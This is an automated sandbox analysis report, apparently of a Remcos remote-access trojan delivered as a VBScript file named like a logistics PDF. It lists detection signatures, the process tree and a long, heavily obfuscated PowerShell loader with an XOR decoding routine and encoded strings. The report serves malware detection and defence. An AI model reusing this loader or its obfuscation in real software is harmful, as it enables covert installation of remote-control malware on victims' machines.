Windows Analysis Report
russelllogistics_PDF98933 laced 2023-06-06 .vbs
Overview
General Information
Detection
Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Sigma detected: Remcos
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Very long command line found
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
- wscript.exe (PID: 9996, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\russelllogistics_PDF98933 laced 2023-06-06 .vbs", MD5: 0639B0A6F69B3265C1E42227D650B7D1)
- cmd.exe (PID: 10680, cmdline: C:\Windows\system32\cmd.exe /c dir, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 10764, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- cmd.exe (PID: 7860, cmdline: cmd /c dir&echo ###RSHELL.EXE###, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 10952, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- powershell.exe (PID: 1604, cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<long obfuscated PowerShell script passed as the script argument>)
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Loftma = """ FAuJn cPtGi oEnh k oUnStba bkHt aCn n 1P1L M{ B P b p a r a m (C[BS HtTrNiEnAg ] `$ SDo oSn y s )G ;S K`$ C h CiSrBoJm a P=K M'M'A ; WUr iBt Se -aHPo s FtG B`$ C hDiKrUoDmU aP; WPrSi tIe - H o s tB `$ C bh iAr oFm Ca ;J WPrA iKtAeU-MH oSsSt `$ CEh iSrSos mJa ;M R A G`$ Mbe sPo =T TN Fe wU-AOIb Bj eBcGt C bDyAtie [ ]O T(O`$NS o o n yCs . LOegn g StChm / d2 S) ;I S UF o r ( ` $UAPcrtYuC a tZeBdSpB = 0 ;M H`$ AAKcFtSu a tRe dAp -GlAtU M`$ SnoSoRnPy FsS.BLSeCn BgStvh ;I `$CA c tMu artseRdMp B+ =L2D)L{ f `$ GblK o s eHfHoS rNrPa R=B `$FS oPo n LyFsP.DSTu bKs t r i Rn g (K`$T ABcZt uFaC t eMd pC,G 2 )T;U O B l O C G B`$AM eSs o [S`$sA c tMuOa tE e dNpW/ 2C ]O E=S U[ cRoOnMvHeU rPtT]H:k: T o BSyUt eS(M`$RGUl UoUsFeMf o r r at,C C1A6P)h;C U`$SS psa gThBeC = C(P`$RM eP sBo [ `$ A icAt uFaat GeKd pH/U2 ]U E-Nb x oBrG V2V0 F2T)A;G R B`$HMAeAs o [ `$iA c t uBa tNe dSp /D2C] Z H=T b`$S SapKaSgPh eU;S D } Z[ SAt r i n g ]V[I SDySs t eM mL. T e xE t . 
E nLcS oWd iOnNg ]e: :SA SK CPI IH.LGO e tnSmt rT i n g (I`$ pM e s oB) M;P} `$ I s nOaKdAiM 0s= kEo nF tSaAkStMa n nk1C1S ' E9G9 BL3CB L9 B E A F sA 7DE 4BA ERA 6 AM6 'P; `$ IS sKnDaEdTiS 1U=Hk oPnG t aEk tNa n nF1I1D ' I8S7DAF3 A O9UB 8DAS5 BH9SAS5FA SCBBLECEA4 9PDmA 3TA H4FFE9HFU8 LES4 9AFAA B4MB 9 APB AVCuAiFu8 4 ACB BOE FAG3RBOCPA FF 8 7 ACF TB EUAB2 A T5TAHE BS9 'F;I`$BIF sPn a dMi 2 =TkPo nA t aekBtRaL nRnK1P1T ' U8FDFABF B LE 9NA B 8 AA5 A 9P8 SB ABEBA E B 8 A FCB B9 B 9V' ; D`$ IMsBnF a dHi 3S= k oCnUt aU kCtAa nEnP 1 1 p'K9 9 UBP3 B 9 B CEMAAF AU7 E 4F9 8OB SFSAK4DBTE GA 3NAL7 A FaET4 8 3 SA 4FB ENA CFABF8 A 5 B AR9 9 A CFPBM8IBBC Ai3SA 9KA FLBF9NE 4 u8F2NABB A S4 A EUA 6 AADFU9 8 A fFPA CA' ; S`$ IFs n a dPiI4K=O kToBnUtSa k tBaRnJn 1U1f K'MB 9 BIERB 8L A 3 AL4 An D 'G;S`$UI Ls nAaGd i R5N=Kk o n lt aAkAtBa n n 1 1F S' 8SD A F CBUE 8H7 A 5 ACE BPF DA 6HABF 8 S2TAAB AM4 TAGE AF6 A FD'P;S`$ ITsPnNaSd iB6 = kSoF n t a kYtL aSnMn 1Q1T I' 9 8W9Z ES9Q9 BRAB A F Au9DA 3FA BPAK6N 8S4FA BDA 7PA F EJ6F E A 8O2IA 3FAsEIA F 8 8 Be3B9 9 AM3 A DD EB6 E AL9 A B FSAU8T AD6 AC3TAD 9N' ; `$CI WsCnlaKd i D7 =TkEoLn tSaDkFtJa n nR1 1C ' 9C8SB FK A 4NB EOAN 3 AM7CA F E 6FEUA 8B 7DAUBHAA4C A BOAODAAU FUAnEr' ; `$ I s nTa d il8E=Bk o n t aRk tFaCn nF1 W1Z N'L9F8 SARFSATCCA 6aA F AP9 LBNEAASFSA EU8bETA F RAP6RA F A D A B BWE BACF 'S;R` $SI s nEa dTi 9R=WkQ o nBt aMk tGaKn n 1 1 'B8 3ZA 4 8M7KAPF OAS7EAS5IB S8DBA3D8Y7 SAM5 AMESB FMAD6 A F N' ;B`$BUD n dGeR0 =F koo nFtBaP k t a n nV 1 1I 'P8 7 B 3H8SE A DFNA 6 ANF RAHDhAwB B CESAPF 9 E ABU3SB AAA FS'D; `$P